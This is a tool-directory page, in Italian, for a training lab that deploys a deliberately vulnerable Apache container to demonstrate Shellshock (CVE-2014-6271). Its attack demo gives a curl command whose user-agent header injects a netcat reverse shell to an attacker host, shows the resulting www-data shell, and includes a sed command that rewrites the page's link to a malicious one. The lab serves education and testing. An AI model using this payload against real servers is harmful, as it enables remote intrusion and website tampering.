Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6271-Apache-Debian — Questo repository è un ambiente PoC di CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271). | Kitploit
Strumenti/GitHubGitHub/mochizuki875/cve-2014-6271-apache-debian
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubmochizuki875/cve-2014-6271-apache-debian

CVE-2014-6271-Apache-Debian

Questo repository è un ambiente PoC di CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1124 anni faNon ancora revisionato

CVE-2014-6271-Apache-Debian

Panoramica

Questo repository è un ambiente PoC di CVE-2014-6271.
Puoi distribuire un servizio web che include la vulnerabilità utilizzando l'immagine contenitore apache2.

Preparazione

Costruzione dell'immagine

Costruisci l'immagine insicura dal Dockerfile.

# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/

Distribuzione del contenitore PoC

Docker

Distribuisci il contenitore PoC come contenitore Docker.

# docker run -d -p 8080:80 training-website-poc:v1.0

Kubernetes

Distribuisci il contenitore PoC come pod e servizio k8s.

# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml

Accesso al servizio web PoC

Una volta completata la distribuzione, puoi consultare la pagina web accedendo al seguente URL con un browser.
Puoi accedere all'ambiente di laboratorio k8s facendo clic sul link "Click!" nella parte inferiore della pagina web.

Docker

http://<docker host IP>:8080

Kubernetes

http://<k8s service endpoint>:<k8s service port>

Demo dell'attacco

In questa demo, puoi modificare la pagina web dall'host attaccante (all'esterno del contenitore) sfruttando la vulnerabilità di CVE-2014-6271.

Esegui questi comandi dall'host attaccante.

Terminale 1

# nc -nvlp 5050

Terminale 2
※In questo caso, distribuiamo il contenitore PoC usando Docker. Nel caso di Kubernetes, l'URL dovrebbe essere http://<k8s service endpoint>:<k8s service port>.

# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable

Dopo di che, puoi vedere che /bin/bash del contenitore PoC può essere eseguito nel terminale 1.

Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin

Modifica il link "Click!" della pagina web.
In questo caso, usiamo una pagina fittizia per il link dannoso.

sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html

Accedi nuovamente alla pagina web e fai clic sul link "Click!" nella parte inferiore della pagina web.

http://<docker host IP>:8080

Riferimenti

https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271

Scarica lo strumento